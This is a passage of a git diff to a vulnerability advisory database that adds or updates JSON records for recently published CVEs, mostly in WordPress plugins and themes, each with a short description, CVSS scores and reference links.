Tags in a Web Page (Basic XSS) vulnerability in wpeverest Everest Forms everest-forms allows Code Injection.This issue affects Everest Forms: from n/a through <= 3.4.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-80" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:11Z" diff --git a/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json b/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json new file mode 100644 index 0000000000000..269016f3e5da1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-97g7-x3h6-6ccc", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-24943" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Conference grandconference allows Reflected XSS.This issue affects Grand Conference: from n/a through <= 5.3.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24943" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/grandconference/vulnerability/wordpress-grand-conference-plugin-5-3-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-97hf-p3f7-pjq2/GHSA-97hf-p3f7-pjq2.json b/advisories/unreviewed/2026/02/GHSA-97hf-p3f7-pjq2/GHSA-97hf-p3f7-pjq2.json new file mode 100644 index 0000000000000..90f6a28c765ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-97hf-p3f7-pjq2/GHSA-97hf-p3f7-pjq2.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-97hf-p3f7-pjq2", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67987" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ExpressTech Systems Quiz And Survey Master quiz-master-next allows SQL Injection.This issue affects Quiz And Survey Master: from n/a through <= 10.3.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67987" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/quiz-master-next/vulnerability/wordpress-quiz-and-survey-master-plugin-10-3-1-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-988g-r4v6-j68v/GHSA-988g-r4v6-j68v.json b/advisories/unreviewed/2026/02/GHSA-988g-r4v6-j68v/GHSA-988g-r4v6-j68v.json new file mode 100644 index 0000000000000..115a062a93106 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-988g-r4v6-j68v/GHSA-988g-r4v6-j68v.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-988g-r4v6-j68v", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26100" + ], + "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26100" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26100" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9crc-72v8-4jmj/GHSA-9crc-72v8-4jmj.json b/advisories/unreviewed/2026/02/GHSA-9crc-72v8-4jmj/GHSA-9crc-72v8-4jmj.json new file mode 100644 index 0000000000000..0f0f63b97d391 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9crc-72v8-4jmj/GHSA-9crc-72v8-4jmj.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9crc-72v8-4jmj", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68549" + ], + "details": "Unrestricted Upload of File with Dangerous Type vulnerability in zozothemes Wiguard wiguard allows Upload a Web Shell to a Web Server.This issue affects Wiguard: from n/a through < 2.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68549" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/wiguard/vulnerability/wordpress-wiguard-theme-2-0-1-arbitrary-file-upload-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json b/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json new file mode 100644 index 0000000000000..e7ae460c93780 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9jmq-xgjm-p8c2", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-67438" + ], + "details": "A Stored Cross-Site Scripting (XSS) vulnerability in Sync-in Server before 1.9.3 allows an authenticated attacker to execute arbitrary JavaScript in a victim's browser. By uploading a crafted SVG file containing a malicious payload, an attacker can access and exfiltrate sensitive information, including the user's session cookies.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67438" + }, + { + "type": "WEB", + "url": "https://gist.github.com/x0root/86db30af91bb0e1707eb7e57a049b6ad" + }, + { + "type": "WEB", + "url": "https://github.com/Sync-in/server/releases/tag/v1.9.3" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json b/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json new file mode 100644 index 0000000000000..9544e750c3d97 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9mr9-pcmg-4xr7", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-53237" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Soflyy WP Wizard Cloak wp-wizard-cloak allows Reflected XSS.This issue affects WP Wizard Cloak: from n/a through <= 1.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53237" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-wizard-cloak/vulnerability/wordpress-wp-wizard-cloak-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9vr5-8j2w-55f6/GHSA-9vr5-8j2w-55f6.json b/advisories/unreviewed/2026/02/GHSA-9vr5-8j2w-55f6/GHSA-9vr5-8j2w-55f6.json new file mode 100644 index 0000000000000..dae6fc770a976 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9vr5-8j2w-55f6/GHSA-9vr5-8j2w-55f6.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9vr5-8j2w-55f6", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68895" + ], + "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in ahachat AhaChat Messenger Marketing ahachat-messenger-marketing allows Password Recovery Exploitation.This issue affects AhaChat Messenger Marketing: from n/a through <= 1.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68895" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/ahachat-messenger-marketing/vulnerability/wordpress-ahachat-messenger-marketing-plugin-1-1-broken-authentication-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json b/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json new file mode 100644 index 0000000000000..10798f0533acb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9w4h-qf26-hvrv", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69326" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms nex-forms-express-wp-form-builder allows Reflected XSS.This issue affects NEX-Forms: from n/a through <= 9.1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69326" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/nex-forms-express-wp-form-builder/vulnerability/wordpress-nex-forms-plugin-9-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c27m-jc6r-9c95/GHSA-c27m-jc6r-9c95.json b/advisories/unreviewed/2026/02/GHSA-c27m-jc6r-9c95/GHSA-c27m-jc6r-9c95.json new file mode 100644 index 0000000000000..ff235846f75f7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c27m-jc6r-9c95/GHSA-c27m-jc6r-9c95.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c27m-jc6r-9c95", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22356" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Automattic Jetpack CRM zero-bs-crm allows PHP Local File Inclusion.This issue affects Jetpack CRM: from n/a through <= 6.7.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22356" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/zero-bs-crm/vulnerability/wordpress-jetpack-crm-plugin-6-7-0-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c29h-3pp8-76hf/GHSA-c29h-3pp8-76hf.json b/advisories/unreviewed/2026/02/GHSA-c29h-3pp8-76hf/GHSA-c29h-3pp8-76hf.json new file mode 100644 index 0000000000000..098309a177e53 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c29h-3pp8-76hf/GHSA-c29h-3pp8-76hf.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c29h-3pp8-76hf", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68051" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Shiprocket Shiprocket shiprocket allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shiprocket: from n/a through <= 2.0.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68051" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/shiprocket/vulnerability/wordpress-shiprocket-plugin-2-0-8-insecure-direct-object-references-idor-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json b/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json new file mode 100644 index 0000000000000..9fcc4765a442d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c49j-5m2h-224g", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22380" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes UnlimHost unlimhost allows PHP Local File Inclusion.This issue affects UnlimHost: from n/a through <= 1.2.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22380" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/unlimhost/vulnerability/wordpress-unlimhost-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c4mr-3p9j-gxmj/GHSA-c4mr-3p9j-gxmj.json b/advisories/unreviewed/2026/02/GHSA-c4mr-3p9j-gxmj/GHSA-c4mr-3p9j-gxmj.json index 3d8c35e0da439..84dd165c9d821 100644 --- a/advisories/unreviewed/2026/02/GHSA-c4mr-3p9j-gxmj/GHSA-c4mr-3p9j-gxmj.json +++ b/advisories/unreviewed/2026/02/GHSA-c4mr-3p9j-gxmj/GHSA-c4mr-3p9j-gxmj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c4mr-3p9j-gxmj", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25322" ], "details": "Cross-Site Request Forgery (CSRF) vulnerability in PublishPress PublishPress Revisions revisionary allows Cross Site Request Forgery.This issue affects PublishPress Revisions: from n/a through <= 3.7.22.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-352" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:16Z" diff --git a/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json b/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json new file mode 100644 index 0000000000000..9e49477964163 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c4qg-fgx5-7xg5", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26722" + ], + "details": "An issue in Key Systems Inc Global Facilities Management Software v.20230721a allows a remote attacker to escalate privileges via PIN component of the login functionality.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26722" + }, + { + "type": "WEB", + "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26722" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c88w-mqr9-prrr/GHSA-c88w-mqr9-prrr.json b/advisories/unreviewed/2026/02/GHSA-c88w-mqr9-prrr/GHSA-c88w-mqr9-prrr.json new file mode 100644 index 0000000000000..9f40ad52bc1e2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c88w-mqr9-prrr/GHSA-c88w-mqr9-prrr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c88w-mqr9-prrr", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-54222" + ], + "details": "Missing Authorization vulnerability in Seraphinite Solutions Seraphinite Accelerator seraphinite-accelerator allows Retrieve Embedded Sensitive Data.This issue affects Seraphinite Accelerator: from n/a through <= 2.22.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54222" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/seraphinite-accelerator/vulnerability/wordpress-seraphinite-accelerator-plugin-2-22-15-authenticated-sensitive-data-exposure-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cchw-3fjc-4266/GHSA-cchw-3fjc-4266.json b/advisories/unreviewed/2026/02/GHSA-cchw-3fjc-4266/GHSA-cchw-3fjc-4266.json index 68c31a69c9abb..77b7381f9b8c3 100644 --- a/advisories/unreviewed/2026/02/GHSA-cchw-3fjc-4266/GHSA-cchw-3fjc-4266.json +++ b/advisories/unreviewed/2026/02/GHSA-cchw-3fjc-4266/GHSA-cchw-3fjc-4266.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cchw-3fjc-4266", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-25412" ], "details": "Missing Authorization vulnerability in mdempfle Advanced iFrame advanced-iframe allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced iFrame: from n/a through <= 2025.10.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:23Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cf7g-cxh2-5vhr/GHSA-cf7g-cxh2-5vhr.json b/advisories/unreviewed/2026/02/GHSA-cf7g-cxh2-5vhr/GHSA-cf7g-cxh2-5vhr.json new file mode 100644 index 0000000000000..c5396f9e05c4d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cf7g-cxh2-5vhr/GHSA-cf7g-cxh2-5vhr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cf7g-cxh2-5vhr", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67975" + ], + "details": "Missing Authorization vulnerability in aDirectory aDirectory adirectory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects aDirectory: from n/a through <= 3.0.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67975" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/adirectory/vulnerability/wordpress-adirectory-plugin-3-0-3-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cg8f-pcpw-6836/GHSA-cg8f-pcpw-6836.json b/advisories/unreviewed/2026/02/GHSA-cg8f-pcpw-6836/GHSA-cg8f-pcpw-6836.json new file mode 100644 index 0000000000000..d7c67a0e2419f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cg8f-pcpw-6836/GHSA-cg8f-pcpw-6836.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg8f-pcpw-6836", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-52744" + ], + "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in inpersttion Inpersttion For Theme err-our-team allows Code Injection.This issue affects Inpersttion For Theme: from n/a through <= 1.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52744" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/err-our-team/vulnerability/wordpress-inpersttion-for-theme-plugin-1-0-arbitrary-code-execution-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-chqg-r72f-gcgr/GHSA-chqg-r72f-gcgr.json b/advisories/unreviewed/2026/02/GHSA-chqg-r72f-gcgr/GHSA-chqg-r72f-gcgr.json new file mode 100644 index 0000000000000..bdb04dc312b7e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-chqg-r72f-gcgr/GHSA-chqg-r72f-gcgr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-chqg-r72f-gcgr", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24953" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Mitchell Bennis Simple File List simple-file-list allows Path Traversal.This issue affects Simple File List: from n/a through <= 6.1.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24953" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/simple-file-list/vulnerability/wordpress-simple-file-list-plugin-6-1-15-arbitrary-file-download-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cjp5-2c5h-3735/GHSA-cjp5-2c5h-3735.json b/advisories/unreviewed/2026/02/GHSA-cjp5-2c5h-3735/GHSA-cjp5-2c5h-3735.json new file mode 100644 index 0000000000000..baf310fe1b0aa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cjp5-2c5h-3735/GHSA-cjp5-2c5h-3735.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cjp5-2c5h-3735", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26099" + ], + "details": "Uncontrolled Search Path Element in Owl opds 2.2.0.4 allows Leveraging/Manipulating Configuration File Search Paths via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26099" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26099" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cm5v-8jg4-g44j/GHSA-cm5v-8jg4-g44j.json b/advisories/unreviewed/2026/02/GHSA-cm5v-8jg4-g44j/GHSA-cm5v-8jg4-g44j.json new file mode 100644 index 0000000000000..9d852c2bd2f5b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cm5v-8jg4-g44j/GHSA-cm5v-8jg4-g44j.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cm5v-8jg4-g44j", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68028" + ], + "details": "Missing Authorization vulnerability in Passionate Brains GA4WP: Google Analytics for WordPress ga-for-wp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GA4WP: Google Analytics for WordPress: from n/a through <= 2.10.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68028" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/ga-for-wp/vulnerability/wordpress-ga4wp-google-analytics-for-wordpress-plugin-2-10-0-broken-access-control-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cq45-jm56-f2cg/GHSA-cq45-jm56-f2cg.json b/advisories/unreviewed/2026/02/GHSA-cq45-jm56-f2cg/GHSA-cq45-jm56-f2cg.json new file mode 100644 index 0000000000000..a6eb7b1c9d3c5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cq45-jm56-f2cg/GHSA-cq45-jm56-f2cg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cq45-jm56-f2cg", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22367" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Coworking coworking allows PHP Local File Inclusion.This issue affects Coworking: from n/a through <= 1.6.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22367" + }, + { + "type": "WEB", + "url": 